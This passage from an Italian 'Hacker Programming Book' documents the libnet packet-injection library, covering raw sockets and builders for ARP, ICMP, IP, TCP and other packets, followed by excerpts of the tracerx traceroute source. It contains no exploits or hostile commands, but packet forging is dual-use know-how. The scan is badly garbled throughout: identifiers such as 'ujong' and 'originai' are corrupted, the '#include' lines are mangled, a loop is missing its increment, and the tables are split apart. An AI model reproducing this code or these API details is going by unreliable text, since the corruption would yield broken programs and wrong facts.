Funzioni legate alla gestione dei pacchetti 



int libnet_open_raw_sock (int) ; 



RV on success: 


opened socket file descriptor 


RV on failure: 


-1 


Reentrant : 


yes 


Arguments : 


1 - protocol number of the desired socket-type 


(symbolic Constant) 





libnet_open_raw_sock() apre un socket RAW relativo ad un determinato tipo di protocollo 

La funzione può anche settare l'opzione IP_HDRINCL. 

Il valore restituito è il descrittore del socket oppure -1 in caso d'errore. 



int libnet_close_raw_sock (int) ; 



RV on success: 


1 


RV on failure: 


-1 


Reentrant : 


yes 


Arguments : 


1 - socket file descriptor to be closed 



La funzione chiude il socket aperto dalla funzione precedente. 



int libnet_select_de V ice(struct sockaddr_in *, u_char **, u_char *) ; 



RV on success: 1 

RV on failure: -1 

Reentrant : no 

Arguments : 1 - preallocated sockaddr_in structure pointer 



2 - pointer to a char pointer containing the device 

3 - pointer to a buf to contain a possible error 



libnet_select_device() permette di selezionare un determinato device in mezzo a quelli 
esistenti. 

Se l'argomento passato punta a NULL allora la funzione cerca di settare il primo device non 
relativo ad un device loopback oppure utilizza il valore specificato per settario. 
Se la funzione è stata eseguita con successo viene restituito il valore 1 se non il valore -1 sta 
ad indicare un fallimento nell'esecuzione dovuto ad una delle molteplici cause legate al 
fallimento ioctl come ad esempio quando non vengono trovate interfacce. 

struct link_int *libnet_open_link_interface (char *, char *) ; 

RV on success: filled in link-layer interface structure 
RV on failure: NULL 
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Argvments : 1 - pointer to a char containing the device to open 

2 - pointer to a buf to contain a possible error 



libnet_open_link_interface() apre un interfaccia ai pacchetti a basso livello. 
Questa procedura è necessaria per riuscire a iniettare dei frames nello strato di link. 
Viene fornito un puntatore al'interfaccia relativa al nome del device ed un altro puntatore ad 
un buffer anche in questo caso utilizzato in caso di errore. 

Il valore restituito è una struttura link_int riempita con I dati oppure NULL in caso di errore. 
int libnet_close_link_interface (struct link_int *) ; 



RV on success: 1 
RV on failure: -1 
Reentrant : yes 

Arguments: 1 - pointer to a link interface structure to be closed 



libnet_close_link_interface() esegue la chiusura di quanto aperto con la funzione recedente. 



RV on success: number of bytes written 
RV on failure: -1 
Reentrant : Yes 

Arguments : 1 - socket file descriptor 

2 - pointer to the packet buffer containing an IP 



datagram 



3 - total packet size 



libnet_write_ip() scrive un pacchetto IP sulla rete. 

Il primo argomento è un socket creato con una precedente chiamata ad una funzione 
libnet_open_raw_sock, il secondo invece è un puntatore ad un buffer contenente il 
datagramma intero, il terzo infine è la dimensione totale del pacchetto. 
La funzione restituisce il numero di bytes scritti oppure -1 in caso d errore. 



int libnet_write_link_layer(struct link_int *, const u_char *, u_char *, int); 



RV on success: 


number of bytes written 


RV on failure: 


-1 


Reentrant : 


yes 


Arguments: 


1 - pointer to an opened link interface structure 




2 - pointer to the network device 




3 - pointer to the packet buffer 




4 - total packet size 



libnet_write_link_layer() scrive un frame relativo ad uno strato di link sulla rete. 

Il primo argomento è un puntatore ad una struttura riempita libnet_link_int, 

Mentre il seguente argomento è un puntaore al device dellla rete. 

Il terzo argomento è un pacchetto RAW mentre l'ultimo è la dimensione del pacchetto. 

Vengono restituiti o i bytes scritti oppure -1 per un errore. 



int libnet_do_checksum (u_char *, int, int); 



RV on success: 1 
RV on failure: -1 
Reentrant : yes 

Arguments: 1 - pointer to the packet buffer 

2 - protocol number of packet type (symbolic 

Constant) 

3 - total packet size 
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libnet_do_checksum() calcola il chacksum per un determinato pacchetto. 
Il primo argomento punta ad un pacchetto completo, il secondo è il protocollo di trasporto del 
pacchetto mentre il terzo argomento è la lunghezza del pacchetto escluso l'header dell' IP. 
La funzione calcola il checksum per il pacchetto in relazione al protocollo di rasporto e 
riempie l'aposto campo all'interno del header. 

Fate attenzione che quando i sockets RAW il chacksum dell' IP è sempre calcolato dal kernel 
e quindi questa funzione non è necessario che la faccia l'utente. 

Quando utilizzate l'interfaccia allo strato di link il checksum dell'IP deve essere esplicitamente 
calcolato, il tipo di protocollo deve essere di tipo IPPROTOJP e la dimensione deve includere 
IP_H. 

La funzione restituisce 1 in caso di successo e -1 in caso di errore. 
I tipi di protocollo supportati sono : 

Value Description 



IPPROTO_TCP TCP 

IPPROTO_UDP UDP 

IPPROTO_ICMP ICMP 

IPPROTO_IGMP IGMP 

IPPROTO_IP IP 



int libnet_build_arp(u_short, u_short, u_short, u_short, u_short, u_char *, u_char *, u_char *, 
u_char *, const u_char *, int, u_char *); 



RV on success: 


1 




RV on f ailure: 


-1 




Reentrant : 


yes 




Arguments: 


1 - 


hardware address format (ARPHRD_ETHER) 




2 - 


protocol address format 




3 - 


length of the hardware address 




4 - 


length of the protocol address 




5 - 


ARP operation type (symbolic Constant) 




6 - 


sender's hardware address 




7 - 


sender's protocol address 




8 - 


target 's hardware address 




9 - 


target 's protocol address 




10 ■ 


- pointer to packet payload 




11 ■ 


- packet payload size 



libnet_build_arp() costruisce un pachetto ARP. 

Fino ad oggi la funzione crea soltanto pacchetti ethernet/ARP, ma in futuro potrebbe 
cambiare. 

I rimi nove argomenti sono standard dell'header ARP 

Con gli ultimi tre argomenti iniziano gli argomenti relativi alla libreria standard di libnet. 
Le operazione ARP possono essere dei seguenti tipi : 



Value 




Description 


ARPOP_ 


REQUEST 


ARP request 


ARPOP_ 


REPLY 


ARP reply 


ARPOP_ 


_REVREQUEST 


RARP request 


ARPOP_ 


REVREPLY 


RARP reply 


ARPOP_ 


_ INVREQUEST 


request to identify peer 


ARPOP_ 


INVREPLY 


reply identifying peer 



Tutte le funzioni legate alla creazione di pacchetti di libnet contengono gli stessi tre argomenti 
finali.: un puntatore ad un payload opzionale (o NULL se non viene incluso nessun payload), 
la diemsnione del payload in bytes oppure 0 se nessuno di questi viene incluso ed infine il più 
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importante il quale deve essere un puntatore ad una zona di memoria preallocata di 
dimensione sufficientemente grande da contenere l'intero pacchetto ARP. 
L'unico motivo che porta la funzione a restituire n errore è dovuto dal fatto che il puntatore 
alla memoria di fatto punta a NULL. 

int libnet_build_dns(u_short, u_short, u_short, u_short, u_short, u_short,const u_char *, int, 
u_char *); 

RV on success: 1 
RV on f allure: -1 
Reentrant : yes 
Arguments: 1 - packet id 

2 - control flags 

3 - number of questions 

4 - number of answer resource records 

5 - number of authority resource records 

6 - number of additional resource records 

7 - pointer to packet payload 

8 - packet payload size 



libnet_build_dns() costruisce un pacchetto DNS. 

I campi DNS statici sono inclusi nei primi sei argomenti ma una variabile opzionale con la 
lunghezza deve essere inclusa per l'uso con l'interfaccia di payload. 
Come nel caso di prima le funzioni contengono gli stessi argomenti terminali solo che nel 
primo caso la memoria doveva contenere l'intero pacchetto ARP, in questo caso dovrà 
contenere quella DNS. 

Anche in questo caso la funzione restituirà il valore -1 solo nel caso in cui il buffer punti a 
NULL. 

int libnet_build_ethernet(u_char *, u_char *, u_short, const u_char *, int, u_char *); 



RV on success: 
RV on f allure: 
Reentrant : 
Arguments : 



1 

-1 
yes 
1 
2 
3 
4 



- pointer to the destination address (string) 

- pointer to the source address (string) 

- ethernet packet type (symbolic Constant) 

- pointer to packet payload 

- packet payload size 



libnet_build_ethernet() costruisce un pacchetto ethernet. 
Gli indirizzi sono attesi come array di unsigned chars 
I valori possono assumere: 





Value 


Description 




E THER TYPE_P UP 


PUP protocol 




E THER TYPE_ IP 


IP protocol 




ETHERTYPE_ARP 


ARP protocol 




E THER TYPE_REVARP 


Reverse ARP protocol 




E THER TYPE_ VLAN 


IEEE VLAN tagging 




ETHERTYPE_LOOPBACK 


Used to test interfaces 



In questo caso, come i due precedenti, il buffer deve essere sufficientemente grande da 
contenere un pacchetto ethernet. 

L'unica condizione che crea una condizione di errore è che la memoria che dovrebbe essere 
preallocata punti di fatto a NULL. 



int libnet_build_icmp_echo(u_char, u_char, u_short, u_short, const u_char *, int, u_char *); 
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RV on success : 


1 




RV on f ailure: 


-1 




Reentrant : 


yes 




Arguments : 


1 - 


packet type (symbollc Constant) 




2 - 


packet code (symbollc Constant) 




3 - 


packet id 




4 - 


packet sequence number 




5 - 


pointer to packet payload 




6 - 


packet payload size 



libnet_build_icmp_echo() costruisce un pacchetto ICMP_ECHO / ICMP_ECHOREPLY. 

Il tipo dei pacchetti deve essere ICMP_ECHOREPLY o ICMP_ECHO e il codice deve essere 

0. 

Tutte le funzioni che creano pacchetti tramite libnet contengono gli stessi tre argomenti 
terminali: un puntatore ad un carico opzionale (o NULL se non deve essere incluso nessun 
payload), la dimensione del payload in bytes ed un puntatore ad una zona di memoria 
preallocata. 

Anche in questo caso l'unica condizione che crea errore è legata al fatto di passare un 
puntatore a NULL invece che ad una zona di memoria allocata. 



int libnet_build_icmp_mask (u_char, u_char, u_short, u_short, u_long, 
const u_char *, int, u_char *) ; 



RV on success: 


1 




RV on f allure: 


-1 




Reentrant : 


yes 




Arguments : 


1 - 


packet type (symbolic Constant) 




2 - 


packet code (symbolic Constant) 




3 - 


packet id 




4 - 


packet sequence number 




5 - 


IP netmask 




6 - 


pointer to packet payload 




7 - 


packet payload size 



libnet_build_icmp_mask() crea un pacchetto ICMPMASKREQ / ICMPMASKREPLY. 
Il tipo deve essere o ICMP MASKREQ o ICMP MASKREPLY e il codice deve essere 0. 
L'argomento relativo alla IP netmask deve essere una classica netmask a 32 bits. 



int libnet_build_icmp_unreach(u_char, u_char, u_short, u_char, u_short, u_short, u_char, 
u_char, ujong, ujong, const u_char *, int, u_char *); 



RV on success: 


1 




RV on f allure: 


-1 




Reentrant : 


yes 




Arguments : 


1 - 


packet type (symbolic Constant) 




2 - 


packet code (symbolic Constant) 




3 - 


originai IP length 




4 - 


originai IP TOS 




5 - 


originai IP id 




6 - 


originai IP fragmentation bits 




7 - 


originai IP time to live 




8 - 


originai IP protocol 




9 - 


originai IP source address 




10 


- originai IP destination address 




11 


- pointer to originai IP payload 










13 


- pointer to pre-allocated packet memory 
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libnet_build_icmp_unreach() costruisce un pacchetto ICMPJJNREACH. 

Gli argomenti dal terzo fino al dodicesimo argomento sono utilizzati per creare l'header IP del 

pacchetto originale che ha generato il messaggio di errore (ICMP unreachable). 

Il tipo di pacchetto deve essere ICMPJJNREACH e il codice deve essere uno dei seguenti : 



Value 




Description 


ICMP_ 


UNREACH_ 


NET 


network is unreachable 


ICMP_ 


UNREACH_ 


HOST 


host is unreachable 


ICMP__ 


ONREACH_ 


PROTOCOL 


protocol is unreachable 


ICMP_ 


UNREACH_ 


_PORT 


port is unreachable 


ICMP_ 


UNREACH_ 


NEEDFRAG 


fragmentation required but DF bit was set 


ICMP__ 


ONREACH_ 


„SRCFAIL 


source routing failed 


ICMP_ 


_UNREACH_ 


NET_ UNKNOWN 


network is unknown 


ICMP_ 


UNREACH_ 


HOST_UNKNOWN 


host is unknown 


ICMP_ 


UNREACH_ 


ISOLATED 


host / network is isolated 


JCMP_ 


UNREACH_ 


_NET_PROHIB 


network is prohibited 


ICMP_ 


UNREACH_ 


HOST_PROHIB 


host is prohibited 


JCMP„ 


_UNREACH_ 


TOSNET 


IP TOS and network 


JCMP„ 


UNREACH_ 


TOSHOST 


IP TOS and host 


ICMP_ 


_UNREACH_ 


_FIL TER_PROHIB 


prohibitive filtering 


ICMP_ 


UNREACH_ 


HOST_PRECEDENCE 


host precedence 


ICMP_ 


_UNREACH_ 


PRECEDENCE_ CUTOFF 





int libnet_build_icmp_timeexceed(u_char, u_char, u_short, u_char, u_short, u_short, u_char : 



RV on success: 


1 




RV on f allure: 


-1 




Reentrant : 


yes 




Arguments : 


1 - 


packet type (symbollc Constant) 




2 - 


packet code (symbollc Constant) 




3 - 


originai IP length 




4 - 


originai IP TOS 




5 - 


originai IP id 




6 - 


originai IP fragmentation bits 




7 - 


originai IP time to live 




8 - 


originai IP protocol 




9 - 


originai IP source address 




10 ■ 


- originai IP destination address 




11 ■ 


- pointer to originai IP payload 




12 ■ 


- originai IP payload size 



libnet_build_icmp_timeexceed() costruisce un pacchetto ICMP_TIMEXCEED. 

Questa funzione è identica a libnet_build_icmp_unreach con I' eccezione del tipo di 

pacchetto e il codice. 

Il pacchetto deve essere ICMP TIMXCEEDJNTRANS per I pacchetti che hanno una 
scadenza durante il transito oppure ICMP_TIMXCEED_REASS per I pacchetti che espirano 
durante il riassemblaggio delle frammentazione. 



int libnet_build_icmp_redirect(u_char, u_char, ujong, u_short, u_char, u_short, u_short, 
u_char, u_char, ujong, ujong, const u_char *, int, u_char *); 



RV on success: 


1 




RV on f allure: 


-1 




Reentrant : 


yes 




Arguments : 


1 - 


packet type (symbollc Constant) 




2 - 


packet code (symbollc Constant) 




3 - 


IP address of the gateway 




4 - 


originai IP length 




5 - 


originai IP TOS 




6 - 


originai IP id 
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7 


- originai IP fragmentation bits 


8 


- originai IP time to live 


9 


- originai IP protocol 


10 


- originai IP source address 


11 


- originai IP destination address 


12 


- pointer to originai IP payload 


13 


- originai IP payload size 



libnet_build_icmp_redirect() costruisce un pacchetto ICMP_REDIRECT. 

Questa funzione è simile a libnet_build_icmp_unreach, con la differenza relativa ali tipo e il 

codice, l'aggiunta di un argomento adatto a contenere l' IP del gateway che deve essere 

usato. 

Il tipo del pacchetto deve essere ICMP_REDIRECT e il codice deve essere uno dei seguenti: 



Value Description 



ICMP UNREACH NET redirect for network 
ICMP_UNREACH_HOST redirect for host 

ICMP_UNREACH_PROTOCOL redirect for type of service and network 
ICMP_UNREACH_PORT redirect for type of service and host 



int libnet_build_icmp_timestamp(u_char, u_char, u_short, u_short, n_time, 
ntime, ntime, const u_char *, int, u_char *); 



RV on success: 1 
RV on failure: -1 
Reentrant: yes 

Arguments: 1 - packet type (symbolic Constant) 

2 - packet code (symbolic Constant) 

3 - packet id 

4 - packet sequence number 

5 - originate timestamp 

6 - receive timestamp 

7 - transmit timestamp 

8 - pointer to packet payload 




libnet_build_icmp_timestamp() costruisce un pacchetto ICMP_TSTAMP / 
ICMPTSTAMPREPLY 

Il tipo del pacchetto deve essere ICMP_TSTAMP o ICMP TSTAMPREPLY e il codice 0. 



int libnet_build_igmp(u_char type, u_char code, ujong ip, const u_char *, int, u_char 



RV on success: 1 
RV on failure: -1 
Reentrant: yes 
Arguments: 1 - packet type 

2 - packet code 

3 - IP address 

4 - pointer to packet payload 




libnet_build_igmp() costruisce un pacchetto IGMP. 
Il tipo deve essere: 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



Value Description 

IGMP_MEMBERSHIP_ QUER Y membership query 

IGMP_V1_MEMBERSHIP_REP0RT ver sion 1 membership report 

IGMP_V2_MEMBERSHIP_REP0RT ver sion 2 membership report 



Il codice, che è un sub-message d'instradamento, deve essere 0. 

int libnet_build_ip(u_short, u_char, u_short, u_short, u_char, u_char, ujong, ujong, const 
u_char *, int, u_char *); 

RV on success: 1 
RV on failure: -1 
Reentrant: yes 

Arguments: 1 - packet length (not including the IP header) 

2 - type of service (symbolic Constant) 

3 - packet id 

4 - fragmentation bits (symbolic Constant) / offset 

5 - time to live 

6 - protocol (symbolic Constant) 

7 - source address 

8 - destination address 

9 - pointer to packet payload 

10 - packet payload size 

11 - pointer to pre-allocated packet memory 

libnet_build_ip() costruisce un pacchetto IP. 

Il campo della frammentazione deve essere a 0 o una combinazione dei seguenti valori: 

Value Description 

IPDF Don't fragment this datagram (this is only valid when alone) 
IP_MF More fragments on the way (OR'd together with an offset vaine) 

IP OFFMASK è usato per recuperare l'offset dal campo della frammentazione. 
Il pacchetto IP non deve essere maggiore di IP MAXPACKET bytes. 

La sorgente e la destinazione devono essere in network-byte order. 

L'interfaccia di payload deve essere solo usata per costruire un datagramma IP 



int libnet_build_rip(u_char, u_char, u_short, u_short, u_short, ujong, ujong, ujong, 
ujong, const u_char *, int, u_char *); 

RV on success: 1 
RV on failure: -1 
Reentrant: yes 

Arguments: 1 - command (symbolic Constant) 

2 - version (symbolic Constant) 

3 - routing domain (or zero) 

4 - address family 

5 - route tag (or zero) 

6 - IP address 

7 - netmask (or zero) 

8 - next hop IP address (or zero) 

9 - metric 

10 - pointer to packet payload 

1 1 - packet payload size 
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libnet_build_rip() costruisce un pacchetto RIP. 

In funzione della versione di RIP che si sta usando I pacchetti possono essere differenti. 
Le differenze sono : 



Argument 


Version 1 


Version 2 


first 


command 


command 


second 


RIPVER_1 


RIPVER_2 


third 


zero 


routing domain 


fourth 


address family 


address family 


fifth 


zero 


route tag 


sixth 


IP address 


IP address 


sev&nth 


zero 


subnet mask 


eighth 


zero 


next hop IP 


ninth 


metric 


metric 


1 comandi possono essere: 


Value 


Description 




RIPCMD_REQUEST 


RIP request 




RIPCMD_RESPONSE 


RIP response 


RIPCMD_ TRACEON 


RIP tracing 


on 


RIPCMD_ TRACEOFF 


RIP tracing off 


RIPCMD_POLL 


RIP polling 





RIPCMD_POLLENTRY 
RIPCMD_MAX 



int libnet_build_tcp(u_short, u_short, ujong, ujong, u_char, u_short, u_short, const u_char 
*, int, u_char *); 

RV on success: 1 
RV on failure: -1 
Reentrant: yes 
Arguments: 1 - source port 

2 - destination port 

3 - sequence number 

4 - acknowledgement number 

5 - control flags (symbolic Constant) 

6 - window size 

7 - urgent pointer 

8 - pointer to packet payload 

9 - packet payload size 



libnet_build_tcp() costruisce un pacchetto TCP. 
I flags possono essere: 

Value Description 

TH_URG urgent data is present 

TH_ACK acknowledgement number field should be checked 

TH_PSH push this data to the application as soon as possible 

TH_RST reset the referenced connection 

TH_SYN synchronize sequence numbers 

TH_FIN finished sending data (sender) 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 




RV on success: 1 
RV on failure: -1 
Reentrant: yes 
Arguments: 1 - source port 

2 - destination port 

3 - pointer to packet payload 

4 - packet payload size 

5 - pointer to pre-allocated packet memory 

libnet_build_udp() costruisce un pacchetto UDP. 

| int libnet_insert_ipo(struct ipoption *opt, u_char optjen, u_char *buf); 

RV on success: 1 
RV on failure: -1 
Reentrant: yes 

Arguments: 1 - pointer to an IP options structure (filled in) 




libnet_insert_ipo() inserisce un opzione IP all'interno di un pacchetto IP precostruito. 
Viene fornito un puntatore a una struttura con le opzioni, la dimensione e un puntaore ad un 
pacchetto precostruito. 

La funzione restituisce -1 se l'opzione è relativa ad un pacchetto troppo grande oppure se il 
buffer del pacchetto è NULL 




RV on success: 1 
RV on failure: -1 
Reentrant: yes 

Arguments: 1 - pointer to an TCP options structure (filled in) 

2 - length of the options 

3 - pointer to a complete TCP packet 

libnet_insert_tcpo() inserisce un opzione TCP in un pacchetto TCP/IP precostruito 

Viene passato un puntatore ad una struttura con le opzioni., la dimensione e un puntatore ad 

un pacchetto precostruito. 

Funzioni di supporto 



int libnet_seed_prand(); 



RV on success: 1 
RV on failure: -1 
Reentrant: yes 
Arguments: NA 

libnet_seed_prand() inizializza lo pseudo-random number generator. 
La funzione serve a srandom. 



ujong libnet_get_prand(int); 

RV on success: 1 
RV on failure: NA 
Reentrant: yes 
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Arguments: 1 - maximum size of pseudo-random number desired (symbolic 
Constant) 



libnet_get_prand() genera uno psuedo-random number. 

Il range del valore restituito è controllato dall'unico argomento: 



Value 


Description 


PR2 


0-1 


PR8 


0 - 255 


PR16 


0 - 32757 


PRul6 


0 - 65535 


PR32 


0 - 2147483647 



void libnet_hex_dump(u_char *buf, int len, int swap, FILE *stream); 



RV on success: NA 

RV on failure: NA 

Reentrant: yes 

Arguments: 1 - packet to dump 

2 - packet length 

3 - byte swap flag 

4 - previously opened stream to dump to the packet to 

libnet_hex_dump() stampa un paccheto in hesadecimale 



int libnet_plist_chain_new(struct libnet_plist_chain **, char *); 



RV on success: 1 
RV on failure: -1 
Reentrant: yes 

Arguments: 1 - pointer to a libnet_plist_chain pointer 



libnet_plist_chain_new() costruisce una nuova catena di port-list adatta a libnet 

La catena libnet port-list è un modo semplice e veloce di implementare un range di port-list 



int libnet_plist_chain_next_pair(struct libnet_plist_chain *, u_short *, u_short *); 



RV on success: 1, 0 
RV on failure: -1 
Reentrant: yes 

Arguments: 1 - pointer to a libnet_plist_chain pointer 
2 - pointer to the beginning port (to be filled in) 



libnet_plist_chain_next_pair() prende la prossima copia di porte dalla lista 



int libnet_plist_chain_dump(struct libnet_plist_chain *); 



RV on success: 1 
RV on failure: -1 
Reentrant: yes 
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libnet_plist_chain_dump() esegue il dump della catena di port-list. 



u_char *libnet_plist_chain_dump_string(struct libnet_plist_chain *); 



RV on success: pointer to the token list as a string 
RVonfailure: NULL 
Reentrant: no 

Arguments: 1 - pointer to a libnet_plist_chain pointer 



libnet_plist_chain_dump_string() ritorna la catena della port-listcome una stringa. 




RV on success: NA 
RV on failure: NA 
Reentrant: yes 

Arguments: 1 - pointer to a libnet_plist_chain pointer 

libnet_plist_chain_free() libera la memoria associata con la catena di port list. 
Quelli che seguono sono files che rappresentano un esempio d'uso di LIBNET. 



/* 

* $Id: tx_framework.c,v 1.3 1999/06/03 22:06:52 route Exp $ 
* 

* Trace rx 

* tx_framework.c - mairi tracerx toplevel routines 
* 

* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus . com> 

* Jeremy F. Ranch <jrauch@cadre . org> 

* Ali rights reserved. 
* 

* Redistribution and use in source and binary forms, with or without 

* modification, are permitted provided that the following conditions 

* are met : 

* 1 . Redistributions of source code must retain the above copyright 

* notice, this list of conditions and the following disclaimer . 

* 2. Redistributions in binary form must reproduce the above copyright 

* notice, this list of conditions and the following disclaimer in the 

* documentation and/or other materials provided with the distribution . 
* 

* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS * "AS IS ' ' AND 

* ANY EXPRESS OR IMPLIED WARRANTIES , INCLUDING, BUT NOT LIMITED TO, THE 

* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 
PURPOSE 

* ARE DISCLAIMED . IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE 

* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
CONSEQUENTIAL 

* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 

* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 

* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, 
STRICT 

* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 

* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 

* SUCH DAMAGE. 
* 

*/ 



#if (HAVE_CONFIG_H) 
^include "./config.h" 
iendif 

^include " . /tx_main.h" 
# include " . /tx_error . h ' 
^include " . /tx_struct .h" 
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^include "./tx__packet_lnject.h" 
^include " . /tx_packet_capture . h " 
^include "./tx__packet_fllter.h" 



int 

tx_in±t_control (struct tx_control **tx_c) 
{ 

/* 

* Heap memory for the control structure. 
*/ 

*tx_c = (struct tx_control *)malloc (slzeof (struct tx_control) ) ; 

if (!(*tx_c)) 

{ 

return (-1) ; 

} 

/* 

* Heap memory for the llbnet link interface structure. 
*/ 

(*tx_c)->l = 

(struct libnet_link_int *)malloc (si zeof (struct libnet_link_int) ) ; 
if (! ((*tx_c)->l)) 
{ 

return (-1) ; 

} 

if (libnet_seed _prand() == -1) 
{ 

tx_error (CRITICAL, "Can't initialize the random number 
generator\n ") ; 

return (-1) ; 

} 

/* 

* Initialize defaults to mimic a standard traceroute scan. 
*/ 



(*tx_c) 


->device 




NULL; 


/* 


set later */ 


(*tx_c) 


->current_ttl 




i; 


/* 


start at 1 hop */ 


(*tx_c) 


->max_ttl 




30; 


/* 


end at 30 */ 


(*tx_c) 


->initial_sport 




libnet_get_prand (PRul 6) ; 


(*tx_c) 


->initial_dport 




32768 + 666; 


/* 


standard tr */ 


(*tx_c) 


->id 




getpidf) ; 


/* 


packet id */ 


(*tx_c) 


->use_name 




i; 


/* 


resolve IP addresses */ 


(*tx_c) 


->packet_size 




PACKET_MIN; 


/* 


IP + UDP + payload */ 


(*tx_c) 


->ip_tos 




0; 


/* 


set later */ 


(*tx_c) 


->ip_df 




0; 


/* 


set later */ 


(*tx_c) 


->packet_offset 




0; 


/* 


set later */ 


(*tx_c) 


->protocol 




IPPROTO_UDP; 


/* 


UDP */ 


(*tx_c) 


->probe_cnt 




3; 


/* 


3 probes */ 


(*tx_c) 


->verbose 




0; 


/* 


Sssssh */ 


(*tx_c) 


->reading_wait 




5; 


/* 


5 seconds */ 


(*tx_c) 


->writing_pause 




0; 


/* 


no writing pause */ 


(*tx_c) 


->host 




0; 


/* 


set later */ 


(*tx_c) 


->packets_sent 




0; 


/* 


set later */ 


(*tx_c) 


->pa ckets_ reply 




0; 


/* 


set later */ 


(*tx_c) 


->1 




NULL; 


/* 


pcap descriptor */ 


(*tx_c) 


->p 




NULL; 


/* 


libnet descriptor */ 


memset 


(& (*tx_c) ->sin, 0, 


sizeof (struct 


sockaddr_in) ) ; 



return (1) ; 

} 



int 

tx_init_network (struct tx_control **tx_c, char *err_buf) 
{ 
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* Set up the network interface and determine our outgoing IP address . 
*/ 

if (libnet_select_device (S (*tx_c) ->sin, & (*tx_c) ->device, err_buf) == - 

1) 

{ 

return (-1) ; 

} 

/* 

* Open the libnet link-layer injection interface. 
*/ 

(*tx_c)->l = libnet_open_link_interface((*tx_c)->device, err_buf) ; 

if (! ((*tx_c)->l)) 

{ 

return (-1) ; 

} 

/* 

* Open the pcap packet capturing interface. 
*/ 

(*tx_c)->p = pcap_open_live ( (*tx_c) ->device, PCAP_BUFSIZ, 0, 500, 
err_buf) ; 

if (! ((*tx_c)->p)) 
{ 

return (-1) ; 

} 

/* 

* Verify minimum packet size and set the pcap filter. 
*/ 

switch ( (*tx_c) ->protocol) 
{ 

case IPPROTO_UDP: 

if ( (*tx_c) ->packet_size < IP_H + UDP_H + TX_P) 
{ 

tx_error (WARNING, 

"Packet size too small, adjusted from %d to %d\n" , 

(*tx_c) ->packet_size , 

IP_H + UDP_H + TX_P) ; 
(*tx_c) ->packet_size = IP_H + UDP_H + TX_P; 

} 

if (tx_set_pcap_filter(TX_BPF_FILTER_UDP, tx_c) == -1) 
{ 

return (-1) ; 

} 

break; 
case IPPROTO_TCP : 

if ( (*tx_c) ->packet_size < IP_H + TCP_H + TX_P) 
{ 

tx_error (WARNING, 

"Packet size too small, adjusted from %d to %d\n", 

(*tx_c) ->packet_size, 

IP_H + TCP_H + TX_P) ; 
(*tx_c) ->packet_size = IP_H + TCP_H + TX_P; 

} 

if (tx_set_pcap_filter(TX_BPF_FILTER_TCP, tx_c) == -1) 
{ 

return (-1) ; 

} 

break; 
case IPPROTO_ICMP : 

if ( (*tx_c) ->packet_size < IP_H + ICMP_ECHO_H + TX_P) 
{ 

tx_error (WARNING, 

"Packet size too small, adjusted from %d to %d\n", 
(*tx_c) ->packet_size , 
IP_H + ICMP_ECHO_H + TX_P) ; 
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if (tx_set_pcap_fllter(TX_BPF_FILTER_ICMP, tx_c) == -1) 
{ 

return (-1) ; 

} 

break; 
de fault: 

sprint f (err_buf , "Unknown protocol, can't set packetslze or 

filter\n") ; 

return (-1) ; 

} 

/* 

* Allocate packet header memory. 
*/ 

lf (libnet_init __packet ( 

(*tx_c) ->packet_size + ETH_H, /* Include space for link layer */ 
& (*tx_c) ->tx_packet) == -1) 

{ 

sprint f (err_buf , "llbnet_lnlt _packet : %s\n", strerror (ermo) ) ; 
return (-1) ; 

} 

return (1) ; 

} 



int 

tx_do_scan (struct tx_control **tx_c) 
{ 

int i, j; 
/* 

* Build a probe *template\ This template will be used for each 

* probe sent and it will be updated each pass through the main loop. 
*/ 

tx_packet_build _probe (tx_c) ; 
/* 

* Increment the hopcounter and update packet template. 
*/ 

for (i = 0; i < (*tx_c) ->max_ttl; i++) 
{ 

/* 

* Send a round of probes . 
*/ 

for (j = 0; j < (*tx_c)->probe_cnt; 
{ 

tx_packet_inject (tx_c) ; 
fprintf (stderr, " . ") ; 

} 

tx_packet_update_probe (tx_c) ; 
fprintf (stderr, " \n ") ; 

} 

tx_error (FATAI* , "Hopcount exceeded. \n" ) ; 
return (1) ; 

} 



int 

tx_shutdown (struct tx_control **tx_c) 
{ 

pcap_close ( (*tx_c) ->p) ; 

libnet_close_link_interface ( (*tx_c) ->1) ; 
free ( (*tx_c) ->1) ; 

libnet_destroy_packet (& (*tx_c) ->tx_packet) ; 
free (*tx_c) ; 
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Il secondo file si chiama tx_packet_build.c 
/* 

* $Id: tx _packet_build.c,v 1.3 1999/06/03 22:06:52 route Exp $ 
* 

* Tracerx 

* tx_packet_build . c - tracerx packet constructlon routines 
* 

* Copyright (c) 1999 Mike D. Schlffman <mlke@lnfonexus . com> 

* Jeremy F. Ranch <jrauch@cadre . org> 

* Ali rights reserved. 
* 

* Redistribution and use in source and blnary forms, wlth or without 

* modlflcatlon, are permitted provided that the followlng condltlons 

* are met : 

* 1 . Redlstrlbutlons of source code must retaln the above copyright 

* notice, thls list of conditions and the followlng disclaimer . 

* 2. Redlstrlbutlons in blnary form must reproduce the above copyright 

* notice, this list of conditions and the followlng disclaimer in the 

* documentation and/or other materials provided wlth the distribution . 
* 

* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS * ~AS IS ' ' AND 

* ANY EXPRESS OR IMPLIED WARRANTIES , INCLUDING, BUT NOT LIMITED TO, THE 

* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 
PURPOSE 

* ARE DISCLAIMED . IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE 

* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
CONSEQUENTIAL 

* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 

